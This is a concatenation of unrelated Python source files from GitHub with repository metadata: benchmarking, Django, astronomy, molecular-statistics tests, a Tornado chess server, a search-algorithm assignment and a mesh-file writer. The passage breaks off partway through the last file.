2013-01-09T01:43:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*-
import human_curl
import json

from query_model.query_url_implementations import (
    run_human_curl_async, run_curl_multiprocessing, run_urllib2_multiprocessing
)
from query_model.predict_lookup_time import predict_lookup_time


def query_urls(uri_count, parallelism, actor_source, method, compare_all):
    def get_actor_list(actor_source, limit):
        actor_urls = [str(u) for u in json.loads(
            human_curl.get(actor_source).content)
        ]
        if len(actor_urls) < limit:
            print "Reusing actors. Maybe start more real actors"
            while len(actor_urls) < limit:
                actor_urls.extend(actor_urls)
        return actor_urls[:limit]

    actor_urls = get_actor_list(actor_source=actor_source, limit=uri_count)

    if compare_all:
        best_result = None
        for m in (run_human_curl_async, run_curl_multiprocessing,
                  run_urllib2_multiprocessing):
            result = m(url_list=actor_urls, parallelism=parallelism)
            if not best_result or result < best_result:
                best_result = result
        _prediction = predict_lookup_time(
            uri_count=uri_count, parallelism=parallelism
        )
    else:
        return method(url_list=actor_urls, parallelism=parallelism)


def main():
    import argparse
    parser = argparse.ArgumentParser(
        "Measure different implementations for get many urls"
    )
    parser.add_argument("-n", "--uri_count", default=20, type=int,
        help="Urls to crawl during a test. Default: 20"
    )
    parser.add_argument("-p", "--parallelism", default=5, type=int,
        help=("Run query with <p> parallelism. Default: 5")
    )
    parser.add_argument(
        "-s", "--actor-source", required=True, type=str,
        help=("Source that responds with a JSON list "
              "of actor URIs.")
    )
    parser.add_argument(
        "-m", "--method", default=run_human_curl_async.__name__,
        choices=(run_human_curl_async.__name__,
                 run_curl_multiprocessing.__name__,
                 run_urllib2_multiprocessing.__name__),
        help=("Which method to use for query")
    )
    parser.add_argument(
        "--compare-all", action="store_true", default=True,
        help=("Compare all implementations and include simulation")
    )
    parsed_args = parser.parse_args().__dict__

    if not parsed_args['method'] in globals():
        raise argparse.ArgumentError("Invalid choice! "
            "Please pass run_human_curl_async, run_curl_multiprocessing "
            "or run_urllib2_multiprocessing"
        )
    parsed_args['method'] = globals()[parsed_args['method']]

    query_urls(**parsed_args)
UTF-8
Python
false
false
2,013
7,533,372,645,952
3624f0e758ed831b52b9baf722942aaff3800cbd
0cfd8b6a98339468457b6539b48ce77fcdac5543
/common/customer/migrations/0001_initial.py
248a656b26a947caa6fbe96701e6044ce21470e7
[]
no_license
vaputa/chain-hotel-book-system
https://github.com/vaputa/chain-hotel-book-system
ecf4a99f93c5ef37907be7698e2c913f4a41bc56
9c92f7b31d4a7884384ab2e8c07e171ef4aa8e3a
refs/heads/master
2016-09-09T18:36:12.254936
2014-12-31T06:12:01
2014-12-31T06:12:01
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Customer',
            fields=[
                ('customer_id', models.AutoField(serialize=False, primary_key=True)),
                ('credit', models.IntegerField(default=0)),
                ('email', models.EmailField(max_length=254)),
                ('phone', models.CharField(max_length=20)),
                ('password', models.CharField(max_length=20)),
                ('status', models.CharField(max_length=20)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
UTF-8
Python
false
false
2,014
16,810,502,006,829
6f68dbbf73761446053bee134de0c6d98b4999dd
7ec1c8d7d45830a9530d867048bd7fdc59b167c1
/pyy/prac/maximum.py
b3a6edf67ac1f9bd9f2c2058e928ac666515442e
[]
no_license
nave91/parch
https://github.com/nave91/parch
e180db939c23445363945a80ed45069d3d2708f7
170e5c398fad8d674e0306fa63336c39e159b2ab
refs/heads/master
2020-05-18T12:04:38.110061
2014-12-04T02:57:02
2014-12-04T02:57:02
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import random

lst = [random.randint(1,100)*random.randint(1,100) for i in range(1,10)]

def maximum(lst):
    m = -1
    for i in lst:
        if i > m:
            m = i
    return m

def maximum2(lst):
    for _i,i in enumerate(lst):
        for _j,j in enumerate(lst):
            if i < j:
                break
            if _j+1 == len(lst):
                return i

print lst
print maximum(lst)
print maximum2(lst)
UTF-8
Python
false
false
2,014
7,344,394,102,265
8b5051a8b16bba4d7162ee496b8b51a0d12a05ef
2361f5cff20e21c21f1c6c9cfb006667a3a570ef
/setup.py
f587ccbb9eed07e473cbb2d24a3de8b1a3f87dca
[]
no_license
dmwoods38/pySecurityCenter
https://github.com/dmwoods38/pySecurityCenter
3461166c7adf1e1a8c9fca915618389b840a5b63
f1ece77dcd3ac3d2928bb43b0635a160715a3b61
refs/heads/master
2020-12-26T03:34:54.812497
2013-08-20T17:37:30
2013-08-20T17:37:30
18,523,682
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from distutils.core import setup
import sys
import securitycenter

# A simple little hack to generate the RST file for pretty formatting for pypi.
try:
    import pypandoc
    with open('README', 'w') as pypidoc:
        pypidoc.write(pypandoc.convert('README.md', 'rst'))
except:
    pass

# These are the requirements for pySecurityCenter
requirements = []

# If we are running on something thats not 2.6 or 2.7, we will need the
# simplejson module.  Python versions less than 2.6 need specifically version
# 2.1.0 as newer ones break on python 2.4.  The reason we need simplejson on
# versions greater than 2.7 is that it seems like the typcasting on the json
# module in version 3.x is too strict, and is causing a lot of issues.
extra = {}
if sys.version_info < (2, 6, 0):
    requirements.append('simplejson==2.1.0')
if sys.version_info > (3,):
    requirements.append('simplejson')
    extra['use_2to3'] = True

setup(
    name='pySecurityCenter',
    version=securitycenter.__version__,
    description='Security Center 4 API Module',
    author=securitycenter.__author__,
    author_email=securitycenter.__author_email__,
    url=securitycenter.__url__,
    py_modules=['securitycenter'],
    install_requires=requirements,
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2.4',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Topic :: Software Development :: Libraries :: Application Frameworks',
    ],
    **extra
)
UTF-8
Python
false
false
2,013
10,505,490,017,857
e38ff956d7a99a7fa3b7a62ce3640968ce1f5bbb
307d17f7a994d4ea75923105508a55dce0df408c
/A1/fuelmaze.py
a05a9015e412850598c2aaff872c987c0c05310a
[]
no_license
B-1P/AI_assignmnets
https://github.com/B-1P/AI_assignmnets
62429eb99438fd3858fce163073ea2987a8ba8ad
de9930bbbb1fdc27b23cae0167f481d38be4d75e
refs/heads/master
2020-04-11T04:13:00.731814
2014-10-14T14:34:12
2014-10-14T14:34:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''FuelMaze Domain Starter code for 384-A1, Last modified: September 30th, 2014 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% CSC384 Fall 2014, Assignment 1 %% %% NAME: %% %% STUDENT NUMBER: %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ''' from problem import * #@UnusedWildImport from math import * import time class FuelmazeState: def __init__(self, pos, fuel): '''Initializes the state where pos is a (X,Y) tuple representing the robot position, fuel is the remaining fuel supply of the robot ''' self.pos = pos self.fuel = fuel def __repr__(self): '''Returns a string representation of the state (i.e. the robot position)''' ret = "(X, Y, fuel) = ({},{},{})".format(self.pos[0], self.pos[1], self.fuel) return ret class Fuelmaze(Problem): def __init__(self, width, height, capacity, fuelstations, obstacles, start_pos, start_fuel, goal_pos): '''Initializes a fuelmaze where width is the size of the maze along the x-axis, height is the size of the maze along the y-axis (y-axis points downward), capacity is the amount of fuel the robot can carry fuelstations is a list of (X,Y) tuples representing where there are fuel stations in the maze, obstacles is a list of (X,Y) tuples representing where there are obstacles in the maze, start_pos is a (X,Y) tuple representing the start position, start_fuel is the amount of fuel the robot starts with, goal_pos is a (X,Y) tuple representing the goal position. Do not change.''' Problem.__init__(self, FuelmazeState(start_pos, start_fuel), FuelmazeState(goal_pos, 0)) self.width = width self.height = height self.capacity = capacity self.fuelstations = fuelstations self.obstacles = obstacles # Implement this! def successors(self, state): '''Return a list of (action, cost, successor) tuples where action is the string name of the action performed in state to reach successor cost is the cost of performing action in state successor is the result of performing action in state ''' '''Valid action names: Right Left Up Down Refuel''' States = list() # Generate the states here if(state.fuel > 0): if((state.pos[0] < self.width - 1) and (not (state.pos[0] + 1, state.pos[1]) in self.obstacles)): States.append(("Right", 1, FuelmazeState((state.pos[0] + 1, state.pos[1]), state.fuel - 1))) if((state.pos[0] > 0) and (not (state.pos[0] - 1, state.pos[1]) in self.obstacles)): States.append(("Left", 1, FuelmazeState((state.pos[0] - 1, state.pos[1]), state.fuel - 1))) if((state.pos[1] < self.height - 1) and (not (state.pos[0], state.pos[1] + 1) in self.obstacles)): States.append(("Down", 1, FuelmazeState((state.pos[0], state.pos[1] + 1), state.fuel - 1))) if((state.pos[1] > 0) and (not (state.pos[0], state.pos[1] - 1) in self.obstacles)): States.append(("Up", 1, FuelmazeState((state.pos[0], state.pos[1] - 1), state.fuel - 1))) if(state.pos in self.fuelstations): States.append(("Refuel", 1, FuelmazeState(state.pos, self.capacity))) #time.sleep(1) #print(States) return States # Implement this! def hashable_state(self, state): '''Return a tuple of the state's values that represents the state such that equivalent states result in equivalent tuples.''' return (state.pos[0], state.pos[1], state.fuel) # Implement this! 
def goal_check(self, state): # If we had a single goal state we could use the following test: # return self.hashable_state(self.goal) == self.hashable_state(state) # We do not specify a target fuel in our goal states, alter this test so that # it only checks position, not fuel #print(self.hashable_state(state)) return (state.pos == self.goal.pos) # The given NULL heuristic (do not change) def fuelmaze_h_uniform(problem, state): # Causes algorithm to do uniform cost search #print(problem.hashable_state(state)) return 0 # # Implement the Manhattan Distance def fuelmaze_h_manhattan(problem, state): #print(problem.hashable_state(state)) return (sqrt(sum((a - b) ** 2 for a, b in zip(state.pos, problem.goal.pos)))) # # Implement your own heuristic def fuelmaze_h_custom(problem, state): return (problem.capacity - state.fuel) '''---------------------------------------------------------------------- Definitions of three sample instances that you will run your code. Do not change these! You are strongly encouraged to also test your code with other fuelmazes of various sizes and start/goal positions (simply add more fuelmazes to the list). -------------------------------------------------------------------------''' if __name__ == "__main__": from search import * #@UnusedWildImport # # TEST CASES # # A LIST OF FUELMAZES TO BE TESTED: # # fuelmaze1: 9x9 fuelmaze, start 1/1, goal 9/9 # # fuelmaze2: 9x9 fuelmaze, start 1/1, goal 9/9 # # fuelmaze3: 9x9 fuelmaze, start 1/1, goal 8/2 fuelmazes = [ Fuelmaze(9, 9, 25, [(8, 6)], [(3, 0), (3, 1), (2, 2), (1, 3), (1, 6), (1, 7), (0, 8), (2, 5), (3, 4), (4, 3), (5, 2), (5, 1), (6, 1), (6, 4), (6, 5), (7, 6), (5, 5), (5, 7), (8, 7)], (0, 0), 25, (8, 8)), Fuelmaze(9, 9, 10, [(0, 8)], [(0, 1), (2, 3), (4, 4), (5, 6), (0, 6), (7, 4), (8, 7), (7, 6), (4, 8), (5, 8)], (0, 0), 10, (8, 8)), Fuelmaze(9, 9, 30, [], [(1, 0), (2, 1), (3, 2), (3, 4), (2, 5), (1, 6), (4, 3), (5, 2), (6, 1), (5, 5), (6, 6), (7, 7), (4, 4)], (0, 0), 30, (7, 1)) ] heuristics = [ ('Uniform heuristic', fuelmaze_h_uniform), ('Manhattan-Distance heuristic', fuelmaze_h_manhattan), ('Custom heuristic', fuelmaze_h_custom) ] # Set this to >=1 to get increasingly informative search statistics trace = 1 for m in range(len(fuelmazes)): maze = fuelmazes[m] for (hname, h) in heuristics: maze.set_heuristic(h) print("====================================================") print("Fuelmaze {}, {}, A* with cycle checking".format(m + 1, hname)) node = astar_search(maze, FullCheck(), trace) print("====================================================") print("")
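One thing worth flagging in the listing above: despite its name, fuelmaze_h_manhattan returns a Euclidean (straight-line) distance, since it takes the square root of a sum of squared coordinate differences. A true Manhattan-distance heuristic over the same FuelmazeState and goal fields would look roughly like this (a sketch only; the function name is mine, not from the assignment code):

def fuelmaze_h_manhattan_l1(problem, state):
    # L1 (Manhattan) distance from the robot position to the goal position.
    return abs(state.pos[0] - problem.goal.pos[0]) + abs(state.pos[1] - problem.goal.pos[1])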
UTF-8
Python
false
false
2,014
4,647,154,655,806
f334f9be3bf30f4da1464eb12c9af0c6c057bd09
24866a4924fdea813f63dca737e34ff924c1c7e9
/server.py
f1aeab42a96ea05b8b4e04690474f25ac8a75aa4
[ "MIT" ]
permissive
lazytype/ultimatechess
https://github.com/lazytype/ultimatechess
91f202beb35055c513ea7dd52b59ad973a0f3778
ae36c6b2d5500df957bc28a86234a1802a568143
refs/heads/master
2020-04-19T14:35:12.636244
2014-01-05T23:43:13
2014-01-05T23:43:13
13,733,909
0
0
null
false
2014-01-05T23:43:13
2013-10-21T05:42:46
2014-01-05T23:43:13
2014-01-05T23:43:13
428
0
0
0
Python
null
null
from chesstools import Board from chesstools import Move import tornado.ioloop import tornado.web import tornado.websocket import tornado.escape from tornado.options import define, options from collections import namedtuple define("port", default=8888, help="Run the server on the given port", type=int) STATIC_PATH = 'ultimatechess' def _fen_layout_fixed(self): pieces = [] for row in self.position: c = 0 rstring = '' for piece in row: if piece: if c: rstring += str(c) c = 0 rstring += str(piece) else: c += 1 if c: rstring += str(c) pieces.append(rstring) return '/'.join(pieces) Board._fen_layout = _fen_layout_fixed games = {} class Game(object): def __init__(self, name, white_player): self.has_black = False self.white_player = white_player self.name = name self.boards = [] self.state = [] for i in xrange(4): self.boards.append(Board()) # self.boards[i].move(self.boards[i].all_legal_moves()[0]) self.state.append(self.boards[i].fen()) games[name] = self def move(self, index, move): print 'called with move: ', move source = move['from'] target = move['to'] movement = Move(source, target) if self.boards[index].is_legal(movement): self.boards[index].move(movement) self.state[index] = self.boards[index].fen() return True return False def found_black(self, black_player): self.has_black = True self.black_player = black_player self.white_player.write_message(tornado.escape.json_encode({'response_type': 'opponent_found'})) def write_message(self, player, raw_message): raw_message['player'] = 'white' if self.white_player is player else 'black' message = tornado.escape.json_encode(raw_message) self.white_player.write_message(message) self.black_player.write_message(message) @staticmethod def parse_position(pos): column = 'abcdefgh'.index(pos[0].lower()) row = int(pos[1]) - 1 return (row, column) @staticmethod def get_quadrant(move): target = move['to'] if target[0] in 'abcd' and target[1] in '5678': return 1 elif target[0] in 'abcd': return 3 elif target[1] in '5678': return 2 else: return 4 @classmethod def create_and_register(cls, name, white_player): game = cls(name, white_player) games[name] = game return game # class MainHandler(tornado.web.RequestHandler): # def get(self): # self.write('hello, world') class WebSocketHandler(tornado.websocket.WebSocketHandler): def open(self): print 'new connection' def on_message(self, message): print 'message received %s' % message try: data = tornado.escape.json_decode(message) except: return if 'create' in data: name = data['create'] if name in games: if games[name].has_black: self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': False, 'created': False})) else: self.name = name games[name].found_black(self) self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': True, 'created': False, 'state': games[name].state, 'player': 'black' })) else: try: game = Game.create_and_register(name, self) self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': True, 'created': True, 'state': game.state, 'player': 'white'})) self.name = name except Exception, e: print e self.write_message(tornado.escape.json_encode({ 'response_type': 'creation', 'success': False, 'created': False})) elif 'move' in data and 'name' in data and data['name'] in games: game = games[data['name']] try: index = data['index'] move = data['move'] moved = game.move(index, move) quadrant = Game.get_quadrant(move) player = game.write_message(self, { 'response_type': 'movement', 'moved': moved, 'index': index, 
'source': move['from'], 'target': move['to'], 'quadrant': quadrant}) except: self.write_message(tornado.escape.json_encode({ 'response_type': 'movement', 'moved': False})) if moved: pass def on_close(self): if self.name in games: del games[self.name] print 'connection closed' if __name__ == '__main__': tornado.options.parse_command_line() application = tornado.web.Application([ (r'/static/(.*)', tornado.web.StaticFileHandler, {'path': STATIC_PATH}), (r'/ws', WebSocketHandler), ]) application.listen(options.port) tornado.ioloop.IOLoop.instance().start()
UTF-8
Python
false
false
2,014
1,597,727,841,113
1f49fbda1f1378dec7012f2687a48528d023c58d
e43a47dbddf1b08818bff8b7c611fb93995487df
/ApplyTelluricCorrection.py
11c9765b46fdd2282ee9a545ba3d57c364d19785
[ "GPL-3.0-only" ]
non_permissive
kgullikson88/LasCampanas-MIKE
https://github.com/kgullikson88/LasCampanas-MIKE
fd7fa3954d47e4a9e2ee543d2dec727eaf7f6b44
52848aa3f87b4ac10248991a8d5e980c478dfeb3
refs/heads/master
2016-09-08T00:52:18.656901
2014-06-06T17:00:05
2014-06-06T17:00:05
16,586,991
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from astropy.io import fits as pyfits import sys from scipy.interpolate import InterpolatedUnivariateSpline as interp import matplotlib.pyplot as plt import DataStructures import os import FittingUtilities import HelperFunctions import numpy plot = True plotorder = 29 def ReadCorrectedFile(fname, yaxis="model"): orders = [] headers = [] hdulist = pyfits.open(fname) numorders = len(hdulist) for i in range(1, numorders): order = hdulist[i].data xypt = DataStructures.xypoint(x=order.field("wavelength"), y=order.field(yaxis), cont=order.field("continuum"), err=order.field("error")) orders.append(xypt) headers.append(hdulist[i].header) return orders, headers def Correct(original, corrected, offset=None): #Read in the data and model original_orders = HelperFunctions.ReadFits(original, extensions=True, x="wavelength", y="flux", errors="error", cont="continuum") corrected_orders, corrected_headers = ReadCorrectedFile(corrected) test_orders, header = ReadCorrectedFile(corrected, yaxis="flux") if plot: order = test_orders[plotorder] model = corrected_orders[plotorder] #for order, model in zip(test_orders, corrected_orders): plt.plot(order.x, order.y/order.cont) plt.plot(model.x, model.y) plt.title("Correction in corrected file only") plt.show() print len(original_orders), len(corrected_orders) if offset == None: offset = len(original_orders) - len(corrected_orders) offset = 0 for i in range(offset, len(original_orders)): data = original_orders[i] data.cont = FittingUtilities.Continuum(data.x, data.y) try: model = corrected_orders[i-offset] header = corrected_headers[i-offset] print "Order = %i\nHumidity: %g\nO2 concentration: %g\n" %(i, header['h2oval'], header['o2val']) except IndexError: model = DataStructures.xypoint(x=data.x, y=numpy.ones(data.x.size)) print "Warning!!! Telluric Model not found for order %i" %i if plot and i == plotorder: plt.figure(1) plt.plot(data.x, data.y/data.cont) plt.plot(model.x, model.y) if model.size() < data.size(): left = numpy.searchsorted(data.x, model.x[0]) right = numpy.searchsorted(data.x, model.x[-1]) if right < data.size(): right += 1 data = data[left:right] elif model.size() > data.size(): sys.exit("Error! 
Model size (%i) is larger than data size (%i)" %(model.size(), data.size())) badindices = numpy.where(numpy.logical_or(data.y <= 0, model.y < 0.05))[0] model.y[badindices] = data.y[badindices]/data.cont[badindices] data.y /= model.y original_orders[i] = data.copy() if plot: plt.show() return original_orders def main1(): if len(sys.argv) > 2: original = sys.argv[1] corrected = sys.argv[2] outfilename = "%s_telluric_corrected.fits" %(original.split(".fits")[0]) print "Outputting to %s" %outfilename corrected_orders = Correct(original, corrected, offset=None) column_list = [] if plot: plt.figure(2) for i, data in enumerate(corrected_orders): if plot and i == plotorder: plt.plot(data.x, data.y/data.cont) #Set up data structures for OutputFitsFile columns = {"wavelength": data.x, "flux": data.y, "continuum": data.cont, "error": data.err} column_list.append(columns) HelperFunctions.OutputFitsFileExtensions(column_list, original, outfilename, mode="new") if plot: plt.title("Corrected data") plt.show() else: allfiles = os.listdir("./") corrected_files = [f for f in allfiles if "Corrected_" in f and f.endswith("-1.fits")] #original_files = [f for f in allfiles if any(f in cf for cf in corrected_files)] #hip_files = [f for f in allfiles if (f.startswith("HIP_") or f.startswith("HR_")) and not f.endswith("-0.fits")] #for original, corrected in zip(original_files, corrected_files): for corrected in corrected_files: idx = corrected.index("_") original = corrected[idx+1:].replace("-1.fits", "-0.fits") print original, corrected outfilename = "%s_telluric_corrected.fits" %(original.split(".fits")[0]) print "Outputting to %s" %outfilename corrected_orders = Correct(original, corrected, offset=None) column_list = [] if plot: plt.figure(2) for i, data in enumerate(corrected_orders): if plot and i == plotorder: plt.plot(data.x, data.y/data.cont) #Set up data structures for OutputFitsFile columns = {"wavelength": data.x, "flux": data.y, "continuum": data.cont, "error": data.err} column_list.append(columns) HelperFunctions.OutputFitsFileExtensions(column_list, original, outfilename, mode="new") if plot: plt.title(original) plt.xlabel("Wavelength (nm)") plt.ylabel("Flux") plt.show() if __name__ == "__main__": main1()
UTF-8
Python
false
false
2,014
11,914,239,287,507
fcaa848f30d4f4bc5c44449c6e8dc1d8e9efa43b
cee4118a42ddb415642b90682942e2fecccb3676
/tests/test_mbar_harmonic_oscillators.py
b0cdee7d7be85fc92f3e3b719c2aae5c30509c2f
[ "GPL-2.0-or-later", "GPL-1.0-or-later", "GPL-2.0-only", "LGPL-2.1-only" ]
non_permissive
gchevrot/pymbar
https://github.com/gchevrot/pymbar
495c73faec8bf59a6a769db92903372cf7c6f3dc
99ed41a849b27b67dcaeb70995cda989f899c502
refs/heads/master
2020-12-30T19:57:39.801064
2014-05-07T22:31:46
2014-05-07T22:31:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""Test MBAR by performing statistical tests on a set of of 1D harmonic oscillators. for which the true free energy differences can be computed analytically. """ import numpy as np from pymbar import MBAR from pymbar.testsystems import harmonic_oscillators from pymbar.utils import ensure_type from pymbar.utils_for_testing import eq z_scale_factor = 3.0 # Scales the z_scores so that we can reject things that differ at the ones decimal place. TEMPORARY HACK O_k = np.array([1.0, 2.0, 3.0]) k_k = np.array([1.0, 1.5, 2.0]) N_k = np.array([50, 60, 70]) def test_analytical_harmonic_oscillators(): """Harmonic Oscillators Test: generate test object and calculate analytical results.""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) mu = test.analytical_means() variance = test.analytical_variances() f_k = test.analytical_free_energies() def test_harmonic_oscillators_samples(): """Harmonic Oscillators Test: draw samples via test object.""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_n, u_kn, N_k = test.sample([5, 6, 7], mode='u_kn') x_n, u_kn, N_k = test.sample([5, 5, 5], mode='u_kn') x_n, u_kn, N_k = test.sample([1, 1, 1], mode='u_kn') x_kn, u_kln, N_k = test.sample([5, 6, 7], mode='u_kln') x_kn, u_kln, N_k = test.sample([5, 5, 5], mode='u_kln') x_kn, u_kln, N_k = test.sample([1, 1, 1], mode='u_kln') def test_harmonic_oscillators_mbar_free_energies(): """Harmonic Oscillators Test: can MBAR calculate correct free energy differences?""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) fe, fe_sigma = mbar.getFreeEnergyDifferences() fe, fe_sigma = fe[0,1:], fe_sigma[0,1:] fe0 = test.analytical_free_energies() fe0 = fe0[1:] - fe0[0] z = (fe - fe0) / fe_sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0) def test_exponential_mbar__xkn(): """Harmonic Oscillators Test: can MBAR calculate E(x_kn)??""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) mu, sigma = mbar.computeExpectations(x_kn) mu0 = test.analytical_means() z = (mu0 - mu) / sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0) def test_exponential_mbar_xkn_squared(): """Harmonic Oscillators Test: can MBAR calculate E(x_kn^2)??""" test = harmonic_oscillators.HarmonicOscillatorsTestCase(O_k, k_k) x_kn, u_kln, N_k_output = test.sample(N_k) eq(N_k, N_k_output) mbar = MBAR(u_kln, N_k) mu, sigma = mbar.computeExpectations(x_kn ** 2) mu0 = test.analytical_x_squared() z = (mu0 - mu) / sigma eq(z / z_scale_factor, np.zeros(len(z)), decimal=0)
UTF-8
Python
false
false
2,014
5,377,299,066,596
173858b4a9d1e344dd06540c391befb5e3326519
ad0db7fff7be389d501169cf66b31177ab252cb6
/5.py
434e5202930443d03dd1b574efc4ddc893f122c4
[]
no_license
hosemagi/Project-Euler-Solutions
https://github.com/hosemagi/Project-Euler-Solutions
63d094637353dc8ea6b9a2c3cab5d70a98b28219
b862a28e18480ab448ce827efc17d248b3191c5c
refs/heads/master
2020-04-02T02:53:32.554577
2011-05-29T08:12:33
2011-05-29T08:12:33
1,816,660
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import math
from datetime import datetime

print "Solving..."
starttime = datetime.now()

found = False   # haven't found number yet
num = 20        # starting state

while not found:                    # while we haven't found an answer
    for i in range(2,21):           # begin checking divisibility for each factor in [2,3,...,20]
        if num % i == 0:            # if the number is divisible by the current factor
            if i == 20:             # and the current factor is 20
                print num           # we found the answer
                found = True
            else:                   # otherwise if the current factor is not 20
                continue            # proceed to check next factor in [2,3,...,20]
        else:                       # if the current factor doesn't divide into the number we're testing
            num += 20               # get a new number (must be a multiple of 20 so increase by 20)
            break                   # break out of the inner for loop

endtime = datetime.now()
elapsed = endtime - starttime
print "Solution took " + str(elapsed)
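The brute-force search above eventually finds the answer, but the same Project Euler 5 result follows directly from folding a least common multiple over 1..20; a minimal standard-library sketch (written for Python 3, unlike the Python 2 script above):

from functools import reduce
from math import gcd

def lcm(a, b):
    return a * b // gcd(a, b)

# Smallest positive number evenly divisible by every integer in 1..20.
print(reduce(lcm, range(1, 21)))  # 232792560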
UTF-8
Python
false
false
2,011
12,927,851,566,197
0469a5553d6d789e54a9683d936a3ad57fbaff90
9065f211832fddb5b2ffcab03cf2653422c24f05
/Lib/OldPeyeQM/write.py
bd0590cfc37d52766a9006f4f98750068f67c464
[ "MIT" ]
permissive
bebopsan/peyeQM
https://github.com/bebopsan/peyeQM
5208b65e5432e0a413b15702ab53109a04f724b8
d87137a4f42b446b4a7a008d966d0632eca0cdfd
refs/heads/master
2016-09-06T00:58:20.354890
2014-10-30T17:34:18
2014-10-30T17:34:18
2,502,525
2
1
null
null
null
null
null
null
null
null
null
null
null
null
null
#! /usr/bin/python ## module Write # -*- coding: utf8 -*- """ This module contains functions to write mesh files (pre-defined file formats). """ __all__=['write_vtk','write_msh','write_solver_input'] __author__="Edward Y. Villegas and Santiago Echeverri" import numpy as np from numpy import linspace as lin from numpy import hstack def write_vtk(filename, title, SET, points, cells, data): """ WriterVTK write VTK ASCII files from matrixes of point coords and list of element nodes whit their data vector/matrix. Parameters: ----------- filename: String which contain filename and path of the output file. title: Title of data (256 characters). SET: Geometry/topology. STRUCTURED_POINTS STRUCTURED_GRID UNSTRUCTURED_GRID POLYDATA RECTILINEAR_GRID FIELD. POLYDATA by default (other still not implemented). points: Matrix of point coords. cells: Matrix of list of element nodes. data: Matrixes of data with arguments. Each set of data has 3 arguments in a list (first add point_data and then cell_data) * datatype: SCALARS, VECTORS, NORMALS, TENSORS (from matrix future) * dataname: List of string names of data (default option future) * datamatrix: list of matrices with data Returns: -------- """ fid = open(filename,'w') fid.write('# vtk DataFile Version 2.0\n') if title == '': title = 'Data' if SET == '': SET = 'POLYDATA' fid.write(title+'\n') fid.write('ASCII\n') fid.write('DATASET '+SET+'\n') n = points.shape[0] # number-of-points datatype = 'double' # Future datatype will be extracted from ndarray.dtype fid.write('POINTS '+str(n)+' '+datatype+'\n') np.savetxt(fid, points, fmt = '%6.6f') m = cells.shape # number-of-elms and number-of-nodes by elm fid.write('POLYGONS '+str(m[0])+' '+str(m[0]*(m[1]+1))+'\n') # elm, elm*(nodbyelm+1) +1 is because include number-of-nodes of polygon count = 0 while count < m[0]: new_elm = np.array(m[1],dtype=int) new_elm = np.hstack([new_elm, cells[count,:]]) if count: cellsvtk = np.vstack([cellsvtk,new_elm.copy()]) else: cellsvtk = new_elm.copy() count = count + 1 np.savetxt(fid,cellsvtk,fmt='%d') ndata = len(data)/3 # sets of data to visualize print 'ndata', ndata if not ndata: print len(data),"arguments, but you need to put 3 arguments by set of data." return count = 0 point_data = 0 cell_data = 0 # From this point it writes for each type of data SCALARS, VECTORS, NORMALS, TENSORS while count < ndata: if len(data[1])!=len(data[2]): print 'Wrong labeling, or... 
something else' break else: # This else is made to avoid wrong labels DataPerType = len(data[2]) # Is the number of data for each type #------ Write over each element on a given category---------------------- k=0 while k < DataPerType: p = data[3*count+2][k].shape #---------------------------Headers--------------------------------- if (p[0] == n) and (not point_data): fid.write("POINT_DATA "+str(n)+"\n") point_data = 1 elif (p[0] == m[0]) and (not cell_data): fid.write("CELL_DATA "+str(m[0])+"\n") elif (not point_data) and (not cell_data): print "Data Matrix", count, "does not match size with nodes neither elements" count = count + 1 continue #----------------- When we have many sets: --------------------------- # fid.write("\\\ The following number tells the amount of Scalar vectors to read") # fid.write('\n'+'\\\ '+str(p[1])+'\n') count2 = 0 while count2 < p[1]: if data[3*count+1] == '': data[3*count+1] = 'Data '+str(count+1)+str(count2) TYPE = 'double' fid.write(data[3*count]+' '+data[3*count+1][k]+ \ '_'+str(count2)+' '+TYPE+'\n') fid.write("LOOKUP_TABLE defaul\n") np.savetxt(fid, data[3*count+2][k][:, count2], \ fmt = '%6.6f') count2 = count2+1 k = k+1 count = count+1 fid.close() return 0 def write_msh(output, nodes, elements, physicalEnt = 'line'): """ This funtion intends to create a file of gmsh format containing the characteristics of a given mesh and its inherent object. For now this program accepts nodes and elements from a 1D problem and returns the files Parameters: ----------- output: Name given for the output file nodes: nodes elements: Elements Physical: entities lines (for now) Returns: ---------- output.msh Nodes and elements in gmsh format output.geo Physical entities contained """ n_elements = str(np.shape(elements)[0]) size_elements = str(np.size(elements)) n_nodes = nodes.shape[0] # Creates the output file for the mesh f = open(output, 'w') # Creates the output file for the geometry by stripping the original name # and adding the .geo format g = open(output.strip('.msh')+'.geo','w') g.write('// Gmsh proyect\n') #-----------------Physical entities 1D----------------------------------- if nodes.ndim == 